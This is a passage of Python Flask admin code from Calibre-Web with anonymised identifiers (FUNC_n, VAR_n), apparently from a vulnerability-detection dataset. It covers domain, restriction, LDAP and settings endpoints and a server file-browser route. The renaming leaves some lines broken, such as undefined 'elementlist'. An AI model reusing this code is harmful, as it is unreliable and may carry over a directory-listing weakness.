FUNC_38(VAR_16, "config_random_books")
FUNC_38(VAR_16, "config_books_per_page")
FUNC_38(VAR_16, "config_authors_max")
FUNC_41(VAR_16, "config_default_language")
FUNC_41(VAR_16, "config_default_locale")
config.config_default_role = constants.selected_roles(VAR_16)
config.config_default_role &= ~constants.ROLE_ANONYMOUS
config.config_default_show = sum(VAR_119(k[5:]) for k in VAR_16 if k.startswith('show_'))
if "Show_detail_random" in VAR_16:
config.config_default_show |= constants.DETAIL_RANDOM
config.save()
flash(_(u"Calibre-Web FUNC_6 updated"), category="success")
VAR_0.debug("Calibre-Web FUNC_6 updated")
FUNC_1()
return FUNC_10()
@VAR_2.route("/ajax/loaddialogtexts/<VAR_6>", methods=['POST'])
@login_required
def FUNC_21(VAR_6):
VAR_63 = {"header": "", "main": "", "valid": 1}
if VAR_6 == "config_delete_kobo_token":
VAR_63["main"] = _('Do you really want to delete the Kobo Token?')
elif VAR_6 == "btndeletedomain":
VAR_63["main"] = _('Do you really want to delete this domain?')
elif VAR_6 == "btndeluser":
VAR_63["main"] = _('Do you really want to delete this VAR_12?')
elif VAR_6 == "delete_shelf":
VAR_63["main"] = _('Are you sure you want to delete this shelf?')
elif VAR_6 == "select_locale":
VAR_63["main"] = _('Are you sure you want to change locales of selected VAR_12(s)?')
elif VAR_6 == "select_default_language":
VAR_63["main"] = _('Are you sure you want to change visible book VAR_23 for selected VAR_12(s)?')
elif VAR_6 == "role":
VAR_63["main"] = _('Are you sure you want to change the selected role for the selected VAR_12(s)?')
elif VAR_6 == "restrictions":
VAR_63["main"] = _('Are you sure you want to change the selected restrictions for the selected VAR_12(s)?')
elif VAR_6 == "sidebar_view":
VAR_63["main"] = _('Are you sure you want to change the selected VAR_39 restrictions for the selected VAR_12(s)?')
elif VAR_6 == "kobo_only_shelves_sync":
VAR_63["main"] = _('Are you sure you want to change shelf sync behavior for the selected VAR_12(s)?')
elif VAR_6 == "db_submit":
VAR_63["main"] = _('Are you sure you want to change Calibre library location?')
elif VAR_6 == "btnfullsync":
VAR_63["main"] = _("Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?")
return json.dumps(VAR_63)
@VAR_2.route("/ajax/editdomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_22(VAR_7):
VAR_61 = request.form.to_dict()
VAR_64 = ub.session.query(ub.Registration).filter(ub.Registration.id == VAR_61['pk']).first()
VAR_64.domain = VAR_61['value'].replace('*', '%').replace('?', '_').lower()
return ub.session_commit("Registering Domains edited {}".format(VAR_64.domain))
@VAR_2.route("/ajax/adddomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_23(VAR_7):
VAR_65 = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
VAR_66 = ub.session.query(ub.Registration).filter(ub.Registration.domain == VAR_65)\
.filter(ub.Registration.allow == VAR_7).first()
if not VAR_66:
VAR_100 = ub.Registration(domain=VAR_65, VAR_7=allow)
ub.session.add(VAR_100)
ub.session_commit("Registering Domains added {}".format(VAR_65))
return ""
@VAR_2.route("/ajax/deletedomain", methods=['POST'])
@login_required
@FUNC_0
def FUNC_24():
try:
VAR_101 = request.form.to_dict()['domainid'].replace('*', '%').replace('?', '_').lower()
ub.session.query(ub.Registration).filter(ub.Registration.id == VAR_101).delete()
ub.session_commit("Registering Domains deleted {}".format(VAR_101))
if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
VAR_100 = ub.Registration(domain="%.%", VAR_7=1)
ub.session.add(VAR_100)
ub.session_commit("Last Registering Domain deleted, added *.* as default")
except KeyError:
pass
return ""
@VAR_2.route("/ajax/domainlist/<VAR_119:VAR_7>")
@login_required
@FUNC_0
def FUNC_25(VAR_7):
VAR_64 = ub.session.query(ub.Registration).filter(ub.Registration.allow == VAR_7).all()
VAR_67 = json.dumps([{"domain": r.domain.replace('%', '*').replace('_', '?'), "id": r.id} for r in VAR_64])
VAR_68 = json.dumps(VAR_67.replace('"', "'")).lstrip('"').strip('"')
VAR_52 = make_response(VAR_68.replace("'", '"'))
VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_52
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0}, methods=['POST'])
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_26(VAR_8, VAR_9):
VAR_10 = request.form.to_dict()
if VAR_10['id'].startswith('a'):
if VAR_8 == 0: # Tags as template
VAR_69 = config.list_allowed_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_allowed_tags = ','.join(VAR_69)
config.save()
if VAR_8 == 1: # CustomC
VAR_69 = config.list_allowed_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_allowed_column_value = ','.join(VAR_69)
config.save()
if VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_allowed_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.allowed_tags = ','.join(VAR_69)
ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_tags))
if VAR_8 == 3: # CColumn per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_allowed_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.allowed_column_value = ','.join(VAR_69)
ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.allowed_column_value))
if VAR_10['id'].startswith('d'):
if VAR_8 == 0: # Tags as template
VAR_69 = config.list_denied_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_denied_tags = ','.join(VAR_69)
config.save()
if VAR_8 == 1: # CustomC
VAR_69 = config.list_denied_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
config.config_denied_column_value = ','.join(VAR_69)
config.save()
if VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_denied_tags()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.denied_tags = ','.join(VAR_69)
ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_tags))
if VAR_8 == 3: # CColumn per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
VAR_69 = VAR_120.list_denied_column_values()
VAR_69[VAR_119(VAR_10['id'][1:])] = VAR_10['Element']
VAR_120.denied_column_value = ','.join(VAR_69)
ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name, VAR_120.denied_column_value))
return ""
def FUNC_27(VAR_10, VAR_11):
VAR_69 = VAR_11()
if VAR_69 == ['']:
VAR_69 = []
if not VAR_10['add_element'] in VAR_69:
elementlist += [VAR_10['add_element']]
return ','.join(VAR_69)
def FUNC_28(VAR_10, VAR_11):
VAR_69 = VAR_11()
if VAR_10['Element'] in VAR_69:
elementlist.remove(VAR_10['Element'])
return ','.join(VAR_69)
def FUNC_29(VAR_12, VAR_13, VAR_14, VAR_15):
if "tags" in VAR_14:
VAR_40 = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(VAR_15)).all()
if not VAR_40:
raise Exception(_("Tag not found"))
VAR_102 = [VAR_17.name for VAR_17 in VAR_40]
else:
VAR_40 = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
.filter(db.cc_classes[config.config_restricted_column].id.in_(VAR_15)).all()
VAR_102 = [VAR_17.value for VAR_17 in VAR_40]
VAR_70 = VAR_12.__dict__[VAR_14].split(",") if len(VAR_12.__dict__[VAR_14]) else []
if VAR_13 == "remove":
VAR_70 = [VAR_17 for VAR_17 in VAR_70 if VAR_17 not in VAR_102]
elif VAR_13 == "add":
VAR_70.extend(VAR_17 for VAR_17 in VAR_102 if VAR_17 not in VAR_70)
else:
raise Exception(_("Invalid Action"))
return ",".join(VAR_70)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_30(VAR_8):
return FUNC_31(VAR_8, 0)
@VAR_2.route("/ajax/addrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_31(VAR_8, VAR_9):
VAR_10 = request.form.to_dict()
if VAR_8 == 0: # Tags as template
if 'submit_allow' in VAR_10:
config.config_allowed_tags = FUNC_27(VAR_10, config.list_allowed_tags)
config.save()
elif 'submit_deny' in VAR_10:
config.config_denied_tags = FUNC_27(VAR_10, config.list_denied_tags)
config.save()
if VAR_8 == 1: # CCustom as template
if 'submit_allow' in VAR_10:
config.config_allowed_column_value = FUNC_27(VAR_10, config.list_denied_column_values)
config.save()
elif 'submit_deny' in VAR_10:
config.config_denied_column_value = FUNC_27(VAR_10, config.list_allowed_column_values)
config.save()
if VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if 'submit_allow' in VAR_10:
VAR_120.allowed_tags = FUNC_27(VAR_10, VAR_120.list_allowed_tags)
ub.session_commit("Changed allowed VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_allowed_tags()))
elif 'submit_deny' in VAR_10:
VAR_120.denied_tags = FUNC_27(VAR_10, VAR_120.list_denied_tags)
ub.session_commit("Changed denied VAR_40 of VAR_12 {} to {}".format(VAR_120.name, VAR_120.list_denied_tags()))
if VAR_8 == 3: # CustomC per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if 'submit_allow' in VAR_10:
VAR_120.allowed_column_value = FUNC_27(VAR_10, VAR_120.list_allowed_column_values)
ub.session_commit("Changed allowed columns of VAR_12 {} to {}".format(VAR_120.name,
VAR_120.list_allowed_column_values()))
elif 'submit_deny' in VAR_10:
VAR_120.denied_column_value = FUNC_27(VAR_10, VAR_120.list_denied_column_values)
ub.session_commit("Changed denied columns of VAR_12 {} to {}".format(VAR_120.name,
VAR_120.list_denied_column_values()))
return ""
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_32(VAR_8):
return FUNC_33(VAR_8, 0)
@VAR_2.route("/ajax/deleterestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_33(VAR_8, VAR_9):
VAR_10 = request.form.to_dict()
if VAR_8 == 0: # Tags as template
if VAR_10['id'].startswith('a'):
config.config_allowed_tags = FUNC_28(VAR_10, config.list_allowed_tags)
config.save()
elif VAR_10['id'].startswith('d'):
config.config_denied_tags = FUNC_28(VAR_10, config.list_denied_tags)
config.save()
elif VAR_8 == 1: # CustomC as template
if VAR_10['id'].startswith('a'):
config.config_allowed_column_value = FUNC_28(VAR_10, config.list_allowed_column_values)
config.save()
elif VAR_10['id'].startswith('d'):
config.config_denied_column_value = FUNC_28(VAR_10, config.list_denied_column_values)
config.save()
elif VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if VAR_10['id'].startswith('a'):
VAR_120.allowed_tags = FUNC_28(VAR_10, VAR_120.list_allowed_tags)
ub.session_commit("Deleted allowed VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
elif VAR_10['id'].startswith('d'):
VAR_120.denied_tags = FUNC_28(VAR_10, VAR_120.list_denied_tags)
ub.session_commit("Deleted denied VAR_40 of VAR_12 {}: {}".format(VAR_120.name, VAR_120.list_allowed_tags))
elif VAR_8 == 3: # Columns per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_119(VAR_9)).first()
else:
VAR_120 = VAR_62
if VAR_10['id'].startswith('a'):
VAR_120.allowed_column_value = FUNC_28(VAR_10, VAR_120.list_allowed_column_values)
ub.session_commit("Deleted allowed columns of VAR_12 {}: {}".format(VAR_120.name,
VAR_120.list_allowed_column_values))
elif VAR_10['id'].startswith('d'):
VAR_120.denied_column_value = FUNC_28(VAR_10, VAR_120.list_denied_column_values)
ub.session_commit("Deleted denied columns of VAR_12 {}: {}".format(VAR_120.name,
VAR_120.list_denied_column_values))
return ""
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0})
@VAR_2.route("/ajax/listrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>")
@login_required
@FUNC_0
def FUNC_34(VAR_8, VAR_9):
if VAR_8 == 0: # Tags as template
VAR_103 = [{'Element': VAR_17, 'type':_('Deny'), 'id': 'd'+str(i) }
for i,VAR_17 in enumerate(config.list_denied_tags()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(config.list_allowed_tags()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
elif VAR_8 == 1: # CustomC as template
VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, VAR_17 in enumerate(config.list_denied_column_values()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(config.list_allowed_column_values()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
elif VAR_8 == 2: # Tags per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
else:
VAR_120 = VAR_62
VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_denied_tags()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_allowed_tags()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
elif VAR_8 == 3: # CustomC per VAR_12
if isinstance(VAR_9, VAR_119):
VAR_120 = ub.session.query(ub.User).filter(ub.User.id == VAR_9).first()
else:
VAR_120 = VAR_62
VAR_103 = [{'Element': VAR_17, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_denied_column_values()) if VAR_17 != '']
VAR_7 = [{'Element': VAR_17, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, VAR_17 in enumerate(VAR_120.list_allowed_column_values()) if VAR_17 != '']
VAR_67 = VAR_103 + VAR_7
else:
VAR_67 = ""
VAR_68 = json.dumps(VAR_67)
VAR_52 = make_response(VAR_68)
VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_52
@VAR_2.route("/ajax/fullsync", methods=["POST"])
@login_required
def FUNC_35():
VAR_55 = ub.session.query(ub.KoboSyncedBooks).filter(VAR_62.id == ub.KoboSyncedBooks.user_id).delete()
VAR_71 = _("{} sync entries deleted").format(VAR_55)
ub.session_commit(VAR_71)
return Response(json.dumps([{"type": "success", "message": VAR_71}]), mimetype='application/json')
@VAR_2.route("/ajax/FUNC_37/")
@login_required
@FUNC_0
def FUNC_36():
return FUNC_37()
def FUNC_37():
VAR_72 = "folder"
VAR_73 = request.args.get('folder', False) == "true"
VAR_74 = request.args.get('filter', "")
VAR_75 = os.path.normpath(request.args.get('path', ""))
if os.path.isfile(VAR_75):
VAR_104 = VAR_75
path = os.path.dirname(VAR_75)
else:
VAR_104 = ""
VAR_76 = False
if os.path.isdir(VAR_75):
VAR_77 = os.path.realpath(VAR_75)
VAR_76 = True
else:
VAR_77 = os.getcwd()
VAR_77 = os.path.normpath(os.path.realpath(VAR_77))
VAR_78 = os.path.dirname(VAR_77)
if not VAR_76:
if os.path.realpath(VAR_77) == os.path.realpath("/"):
VAR_77 = os.path.relpath(VAR_77)
else:
VAR_77 = os.path.relpath(VAR_77) + os.path.sep
VAR_78 = os.path.relpath(VAR_78) + os.path.sep
if os.path.realpath(VAR_77) == os.path.realpath("/"):
VAR_78 = ""
try:
VAR_105 = os.listdir(VAR_77)
except Exception:
VAR_105 = []
VAR_79 = []
for VAR_3 in VAR_105:
try:
VAR_121 = {"name": VAR_3, "fullpath": os.path.join(VAR_77, VAR_3)}
VAR_121["sort"] = VAR_121["fullpath"].lower()
except Exception:
continue
if os.path.isfile(os.path.join(VAR_77, VAR_3)):
if VAR_73:
continue
if VAR_74 != "" and VAR_74 != VAR_3:
continue
VAR_121["type"] = "file"
VAR_121["size"] = os.path.getsize(os.path.join(VAR_77, VAR_3))
VAR_122 = 0
while (VAR_121["size"] >> 10) > 0.3:
VAR_122 += 1
VAR_121["size"] >>= 10
VAR_123 = ("", "K", "M", "G", "T")
VAR_121["size"] = str(VAR_121["size"]) + " " + VAR_123[VAR_122] + "Byte"
else:
VAR_121["type"] = "dir"
VAR_121["size"] = ""
VAR_79.append(VAR_121)
VAR_79 = sorted(VAR_79, key=operator.itemgetter("type", "sort"))
VAR_80 = {
"cwd": VAR_77,
"files": VAR_79,
"parentdir": VAR_78,
"type": VAR_72,
"oldfile": VAR_104,
"absolute": VAR_76,
}
return json.dumps(VAR_80)
def FUNC_38(VAR_16, VAR_17, VAR_18=VAR_119):
return config.set_from_dictionary(VAR_16, VAR_17, VAR_18)
def FUNC_39(VAR_16, VAR_17):
return config.set_from_dictionary(VAR_16, VAR_17, lambda y: y == "on", False)
def FUNC_40(VAR_16, VAR_17):
return config.set_from_dictionary(VAR_16, VAR_17, lambda y: 1 if (y == "on") else 0, 0)
def FUNC_41(VAR_16, VAR_17):
return config.set_from_dictionary(VAR_16, VAR_17, lambda y: y.strip() if y else y)
def FUNC_42(VAR_16):
VAR_21 = None
if VAR_16.get("config_use_google_drive"):
VAR_106 = {}
if not os.path.isfile(gdriveutils.SETTINGS_YAML):
config.config_use_google_drive = False
if gdrive_support:
VAR_21 = gdriveutils.get_error_text(VAR_106)
if "config_use_google_drive" in VAR_16 and not config.config_use_google_drive and not VAR_21:
with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
VAR_106 = json.load(settings)['web']
if not VAR_106:
return FUNC_50(_('client_secrets.json Is Not Configured For Web Application'))
gdriveutils.update_settings(
VAR_106['client_id'],
VAR_106['client_secret'],
VAR_106['redirect_uris'][0]
)
VAR_81 = (not VAR_21) and ("config_use_google_drive" in VAR_16)
if config.config_use_google_drive and not VAR_81:
config.config_google_drive_watch_changes_response = {}
config.config_use_google_drive = VAR_81
if FUNC_41(VAR_16, "config_google_drive_folder"):
gdriveutils.deleteDatabaseOnChange()
return VAR_21
def FUNC_43(VAR_16):
VAR_82 = 0
VAR_83 = False
for VAR_10 in VAR_96:
if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] != VAR_10['oauth_client_id'] \
or VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"] != VAR_10['oauth_client_secret']:
VAR_83 = True
VAR_10['oauth_client_id'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"]
VAR_10['oauth_client_secret'] = VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]
if VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"] \
and VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"]:
VAR_82 += 1
VAR_10["active"] = 1
else:
VAR_10["active"] = 0
ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == VAR_10['id']).update(
{"oauth_client_id": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_id"],
"oauth_client_secret": VAR_16["config_" + str(VAR_10['id']) + "_oauth_client_secret"],
"active": VAR_10["active"]})
return VAR_83
def FUNC_44(VAR_16):
VAR_83 = False
VAR_83 |= FUNC_38(VAR_16, "config_log_level")
VAR_83 |= FUNC_41(VAR_16, "config_logfile")
if not logger.is_valid_logfile(config.config_logfile):
return VAR_83, \
FUNC_50(_('Logfile Location is not Valid, Please Enter Correct Path'))
VAR_83 |= FUNC_40(VAR_16, "config_access_log")
VAR_83 |= FUNC_41(VAR_16, "config_access_logfile")
if not logger.is_valid_logfile(config.config_access_logfile):
return VAR_83, \
FUNC_50(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
return VAR_83, None
def FUNC_45(VAR_16):
VAR_83 = False
VAR_83 |= FUNC_41(VAR_16, "config_ldap_provider_url")
VAR_83 |= FUNC_38(VAR_16, "config_ldap_port")
VAR_83 |= FUNC_38(VAR_16, "config_ldap_authentication")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_dn")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_serv_username")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_user_object")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_object_filter")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_group_members_field")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_member_user_object")
VAR_83 |= FUNC_39(VAR_16, "config_ldap_openldap")
VAR_83 |= FUNC_38(VAR_16, "config_ldap_encryption")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_cacert_path")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_cert_path")
VAR_83 |= FUNC_41(VAR_16, "config_ldap_key_path")
FUNC_41(VAR_16, "config_ldap_group_name")
if VAR_16.get("config_ldap_serv_password", "") != "":
VAR_83 |= 1
config.set_from_dictionary(VAR_16, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
config.save()
if not config.config_ldap_provider_url \
or not config.config_ldap_port \
or not config.config_ldap_dn \
or not config.config_ldap_user_object:
return VAR_83, FUNC_50(_('Please Enter a LDAP Provider, '
'Port, DN and User Object Identifier'))
if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account and Password'))
else:
if not config.config_ldap_serv_username:
return VAR_83, FUNC_50(_('Please Enter a LDAP Service Account'))
if config.config_ldap_group_object_filter:
if config.config_ldap_group_object_filter.count("%s") != 1:
return VAR_83, \
FUNC_50(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
return VAR_83, FUNC_50(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
if config.config_ldap_user_object.count("%s") != 1:
return VAR_83, \
FUNC_50(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
return VAR_83, FUNC_50(_('LDAP User Object Filter Has Unmatched Parenthesis'))
if VAR_16.get("ldap_import_user_filter") == '0':
config.config_ldap_member_user_object = ""
else:
if config.config_ldap_member_user_object.count("%s") != 1:
return VAR_83, \
FUNC_50(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
return VAR_83, FUNC_50(_('LDAP Member User Filter Has Unmatched Parenthesis'))
if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
if not (os.path.isfile(config.config_ldap_cacert_path) and
os.path.isfile(config.config_ldap_cert_path) and
os.path.isfile(config.config_ldap_key_path)):
return VAR_83, \
FUNC_50(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
'Please Enter Correct Path'))
return VAR_83, None
@VAR_2.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@FUNC_0
def FUNC_46():
VAR_84, VAR_85 = FUNC_47()
return Response(json.dumps({"change": VAR_84, "valid": VAR_85}), mimetype='application/json')
def FUNC_47():
VAR_4 = request.form.to_dict()
VAR_16 = {}
VAR_16['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
VAR_4['config_calibre_dir'],
flags=re.IGNORECASE).strip()
VAR_84 = config.config_calibre_dir != VAR_16["config_calibre_dir"] and config.config_calibre_dir
VAR_85 = calibre_db.check_valid_db(VAR_16["config_calibre_dir"], ub.app_DB_path)
return VAR_84, VAR_85
def FUNC_48():
VAR_84 = False
VAR_16 = request.form.to_dict()
VAR_21 = None
VAR_16['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
VAR_16['config_calibre_dir'],
flags=re.IGNORECASE)
try:
VAR_84, VAR_85 = FUNC_47()
VAR_21 = FUNC_42(VAR_16)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
FUNC_51(_("Settings DB is not Writeable"), VAR_21)
try:
VAR_107 = os.path.join(VAR_16['config_calibre_dir'], "metadata.db")
if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(VAR_107):
gdriveutils.downloadFile(None, "metadata.db", VAR_107)
VAR_84 = True
except Exception as ex:
return FUNC_51('{}'.format(ex), VAR_21)
if VAR_84 or not VAR_85 or not config.db_configured:
if not calibre_db.setup_db(VAR_16['config_calibre_dir'], ub.app_DB_path):
return FUNC_51(_('DB Location is not Valid, Please Enter Correct Path'),
VAR_21)
ub.session.query(ub.Downloads).delete()
ub.session.query(ub.ArchivedBook).delete()
ub.session.query(ub.ReadBook).delete()
ub.session.query(ub.BookShelf).delete()
ub.session.query(ub.Bookmark).delete()
ub.session.query(ub.KoboReadingState).delete()
ub.session.query(ub.KoboStatistics).delete()
ub.session.query(ub.KoboSyncedBooks).delete()
ub.session_commit()
FUNC_41(VAR_16, "config_calibre_dir")
calibre_db.update_config(config)
if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
flash(_(u"DB is not Writeable"), category="warning")
config.save()
return FUNC_51(None, VAR_21)
def FUNC_49():
VAR_83 = False
VAR_16 = request.form.to_dict()
try:
VAR_83 |= FUNC_38(VAR_16, "config_port")
VAR_83 |= FUNC_41(VAR_16, "config_trustedhosts")
VAR_83 |= FUNC_41(VAR_16, "config_keyfile")
if config.config_keyfile and not os.path.isfile(config.config_keyfile):
return FUNC_50(_('Keyfile Location is not Valid, Please Enter Correct Path'))
VAR_83 |= FUNC_41(VAR_16, "config_certfile")
if config.config_certfile and not os.path.isfile(config.config_certfile):
return FUNC_50(_('Certfile Location is not Valid, Please Enter Correct Path'))
FUNC_40(VAR_16, "config_uploading")
FUNC_40(VAR_16, "config_unicode_filename")
VAR_83 |= (FUNC_40(VAR_16, "config_anonbrowse")
and config.config_login_type == constants.LOGIN_LDAP)
FUNC_40(VAR_16, "config_public_reg")
FUNC_40(VAR_16, "config_register_email")
VAR_83 |= FUNC_40(VAR_16, "config_kobo_sync")
FUNC_38(VAR_16, "config_external_port")
FUNC_40(VAR_16, "config_kobo_proxy")
if "config_upload_formats" in VAR_16:
VAR_16["config_upload_formats"] = ','.join(
helper.uniq([VAR_17.lstrip().rstrip().lower() for VAR_17 in VAR_16["config_upload_formats"].split(',')]))
FUNC_41(VAR_16, "config_upload_formats")
constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')
FUNC_41(VAR_16, "config_calibre")
FUNC_41(VAR_16, "config_converterpath")
FUNC_41(VAR_16, "config_kepubifypath")
VAR_83 |= FUNC_38(VAR_16, "config_login_type")
if config.config_login_type == constants.LOGIN_LDAP:
VAR_20, VAR_71 = FUNC_45(VAR_16)
if VAR_71:
return VAR_71
VAR_83 |= VAR_20
FUNC_39(VAR_16, "config_remote_login")
if not config.config_remote_login:
ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()
FUNC_39(VAR_16, "config_use_goodreads")
FUNC_41(VAR_16, "config_goodreads_api_key")
FUNC_41(VAR_16, "config_goodreads_api_secret")
if services.goodreads_support:
services.goodreads_support.connect(config.config_goodreads_api_key,
config.config_goodreads_api_secret,
config.config_use_goodreads)
FUNC_38(VAR_16, "config_updatechannel")
FUNC_39(VAR_16, "config_allow_reverse_proxy_header_login")
FUNC_41(VAR_16, "config_reverse_proxy_login_header_name")
if config.config_login_type == constants.LOGIN_OAUTH:
VAR_83 |= FUNC_43(VAR_16)
VAR_20, VAR_71 = FUNC_44(VAR_16)
if VAR_71:
return VAR_71
VAR_83 |= VAR_20
FUNC_41(VAR_16, "config_rarfile_location")
if "config_rarfile_location" in VAR_16:
VAR_124 = helper.check_unrar(config.config_rarfile_location)
if VAR_124:
return FUNC_50(VAR_124)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
VAR_0.error("Settings DB is not Writeable")
FUNC_50(_("Settings DB is not Writeable"))
config.save()
if VAR_83:
web_server.stop(True)
return FUNC_50(None, VAR_83)
def FUNC_50(VAR_19=None, VAR_20=False):
VAR_86 = {}
if VAR_19:
VAR_0.error(VAR_19)
config.load()
VAR_86['result'] = [{'type': "danger", 'message': VAR_19}]
else:
VAR_86['result'] = [{'type': "success", 'message':_(u"Calibre-Web FUNC_6 updated")}]
VAR_86['reboot'] = VAR_20
VAR_86['config_upload']= config.config_upload_formats
